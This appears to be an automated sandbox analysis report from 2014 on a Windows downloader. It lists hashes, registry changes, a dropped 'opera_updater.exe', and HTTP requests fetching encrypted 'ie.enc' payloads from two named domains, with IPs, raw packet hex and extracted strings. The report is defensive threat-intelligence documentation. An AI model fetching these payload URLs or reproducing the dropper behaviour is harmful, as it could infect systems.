Analysis Date: 2014-10-04 14:41:01
MD5: 0af1ead2d5575276cdf145fe9e99055d
SHA1: 880c40bb487a9d40fa197e8cc4e874cd5dc095dc

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 1cfe640fb916f9e71e2f42ce9463b6e6 sha1: d3cefe831eba88d17380b6e877f968ab01e72878 size: 6144
Section .rdata md5: 5991a0937ea1c73a6ea7d2b50760dccf sha1: b09ba9081a37296905432830e2b7a3f680249f52 size: 1536
Section .data md5: 36f425ac30a34478057dae27a1407f15 sha1: 27c149c9c2f3499e5e8e775de3eeba3e88845640 size: 512
Section .rsrc md5: d312230fc901e21ad5d01f3359ba6e14 sha1: 9a3ea68fc338ca5068121b66142c23539c4c2819 size: 10240
Section .reloc md5: 5941791c6b31ac52e41a5ea0912259d3 sha1: 953eb4ea14eb81b605c22a5b1c6a2a709e64de33 size: 512
Timestamp: 2014-02-05 03:55:00
PEhash: 2394682c218c1f7651bd92f22a4a09342e6bc7ab
IMPhash: 7772dfa3e3a72b92db47c13e7be36e20

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: bsitacademy.com
Winsock DNS: wahidexpress.com

Network Details:

DNS: bsitacademy.com
Type: A
107.150.48.43
DNS: wahidexpress.com
Type: A
103.15.74.65
HTTP GET: http://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GET: http://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
HTTP GET: http://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GET: http://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
Flows TCP: 192.168.1.1:1031 ➝ 107.150.48.43:80
Flows TCP: 192.168.1.1:1032 ➝ 103.15.74.65:80
Flows TCP: 192.168.1.1:1033 ➝ 107.150.48.43:80
Flows TCP: 192.168.1.1:1034 ➝ 103.15.74.65:80

Raw Pcap
0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..


Strings
l
\1.scr
C:\0ef05319168d4ea6e80e1da75be0fa94a383a9e86f15db77f1f8dba8857765da
C:\0lXDAvug.exe
C:\166a3b00b55847d77a775764a1bee4761a1c6910020295d2edf998e4563840ab
C:\1oRFNpGw.exe
C:\1QToxUSh.exe
C:\1srfkWkH.exe
C:\1tSwkI_Q.exe
C:\1XVNiGRb.exe
C:\2DGpPc5T.exe
C:\2y6qnqF2.exe
C:\35cac70849c9a622807f9b30f98f4c67cc4f37fa6cc5bc697bcabd2101854762
C:\38116e45cf11c9def2c37fa30e06bc018e46cd9bf891a785b5ba6a5923323d5d
C:\3RSpG5JD.exe
C:\487b40f83626767b4ac5984e18d98f99fb4a29a855746e349fe73a0c83ec2ca3
C:\4OAw6dNj.exe
C:\62eGGURa.exe
C:\6XyPMFPz.exe
C:\7gN7gYzC.exe
C:\7QxouWXz.exe
C:\7ymIe9U4.exe
C:\85c1bcbcb1df218c659f187a6b975a3e805a635b231ecaa523f598a502695a8e
C:\8BUKgAsb.exe
C:\8iD2xfe3.exe
C:\8WFz4opg.exe
C:\90LDUfZ7.exe
C:\95f76a23831a6599512e4d4f58cc2bf54cfa065a766b96091cbc475d9e15665b
C:\9K2UKN2W.exe
C:\9nXXz_EE.exe
C:\9R9GxndA.exe
C:\A94aUTod.exe
C:\ac6bc8b5c6e77d20d8c71df176e613bbfd7bce371987dd408c1355cef7038766
C:\ae7106d17ccf1dfa00d85022a237351a471fee6a6df4895697311caedf72f7cf
C:\aFb_zR5C.exe
C:\aJiQDHmp.exe
C:\aoh7YKiF.exe
C:\aWPFJAp4.exe
C:\aySjDxAm.exe
C:\b99424cbb75f3aca0d9bce5b90d787c810ecf77f3f7a3f7c93ebeda63572f320
C:\BZPk4ssu.exe
C:\CDKo4Ghp.exe
C:\Cj6jWP95.exe
C:\Cs6cTBNe.exe
C:\d2smjgzx.exe
C:\d7143680a75410278c9b95484bc00b271fcf34c23bd0de80aeec3cea7d6cedbc
C:\dfuwp7wT.exe
C:\Documents and Settings\Administrator\
C:\DYEfYtoV.exe
C:\E7Aiu124.exe
C:\EB1ZbEX5.exe
C:\em47xo4g.exe
C:\eo3zZkLG.exe
C:\eRVEqXvp.exe
C:\FJa8_iZT.exe
C:\FKulR4mg.exe
C:\gkF9QPf8.exe
C:\hb9C_kVy.exe
C:\Hlyr8cu6.exe
C:\I7g1NClC.exe
C:\iDBoKK3V.exe
C:\ip0Vt87X.exe
C:\iynSob3w.exe
C:\j2mY72oN.exe
C:\jm5uTqYs.exe
C:\jQSAEp11.exe
C:\Jw0L2zLp.exe
C:\kfAsMA6f.exe
C:\LioP7mJk.exe
C:\lJzJ695v.exe
C:\Lr78kkyl.exe
C:\LW9LFvyo.exe
C:\LXC4kS7e.exe
C:\m7qLCegi.exe
C:\mlD4Pebo.exe
C:\mmfLpLPz.exe
C:\mMu0FlJa.exe
C:\MV_lRsiq.exe
C:\N6oieXD9.exe
C:\NuQlHrG_.exe
C:\o5F_sGrl.exe
C:\O6mPl4CJ.exe
C:\OBN6Wm4b.exe
C:\OfnR0QBs.exe
C:\ONQ8CwrH.exe
C:\onxgW4YJ.exe
C:\OtxunVdk.exe
C:\ow_GN9CF.exe
C:\OzzG044a.exe
C:\pcn9cqvm.exe
C:\pkL1CSOT.exe
C:\pKYELYku.exe
C:\Pl1TpBiT.exe
C:\Q4KdtL_e.exe
C:\Q9p9HrRV.exe
C:\qFCCRxHi.exe
C:\QRmH2e2R.exe
C:\qYxqpebq.exe
C:\rJhXQRa7.exe
C:\rrrNORCR.exe
C:\SBReWEE_.exe
C:\SOZHBfkz.exe
C:\SPc00Dsv.exe
C:\sSnbqHac.exe
C:\tcLaY00T.exe
C:\tGTFm9eA.exe
C:\tHcTvWln.exe
C:\TMtk4JD7.exe
C:\tRe6dTsc.exe
C:\TXzz8BIV.exe
C:\TyMYbWO0.exe
C:\u8EYDKDi.exe
C:\uogryEbX.exe
C:\UowVcj_v.exe
C:\uxk8IO6h.exe
C:\uyulAGYX.exe
C:\V8Fv2uli.exe
C:\Vbd0Y1yA.exe
C:\vEO8rNam.exe
C:\Vh70EiAi.exe
C:\waSEmDhb.exe
C:\X6DtDo8m.exe
C:\xfqsWlNO.exe
C:\XomZXsYG.exe
C:\Xp5PSsUo.exe
C:\XPO1cNIb.exe
C:\xRLei8eC.exe
C:\XWk6vgYT.exe
C:\yENgd8XS.exe
C:\yf66k_1J.exe
C:\yr05wBsQ.exe
C:\yrvtGcT5.exe
C:\ytVvpYAM.exe
C:\YUeYnGj3.exe
C:\ZcBTXBdO.exe
C:\znWA1da2.exe
C:\zRw0S22m.exe
:	;);4;
4%5*5N5U5\5c5i5q5w5~5
5%6I6Y6y6
7%7*7/7?7J7X7^7
7D9Y9^9h9n9w9
absent
_acmdln
_adjust_fdiv
Africa
AhAuhh
AWVAf9
Bagdad
BeginPaint
button
COMCTL32.dll
_controlfp
CreateFileA
CreateWindowExA
:D,*~aB?
@.data
DefWindowProcA
DispatchMessageA
DragQueryFileA
EndPaint
_except_handler3
GDI32.dll
__getmainargs
GetMessageA
GetModuleHandleA
GetStartupInfoA
;H7-G@
hAAhAA
InitCommonControlsEx
_initterm
iRichu
k{.cee
KERNEL32.dll
KXG[O_
lantie
MSVCRT.dll
 ';(&NK:&]9
o7U"o7U"
__p__commode
__p__fmode
PostQuitMessage
PuZN=0
`.rdata
RegisterClassA
@.reloc
SendMessageA
__set_app_type
__setusermatherr
SHELL32.dll
ShowWindow
solienty
static
TextOutA
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateMessage
uAhhAhA
USER32.dll
_XcptFilter
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>(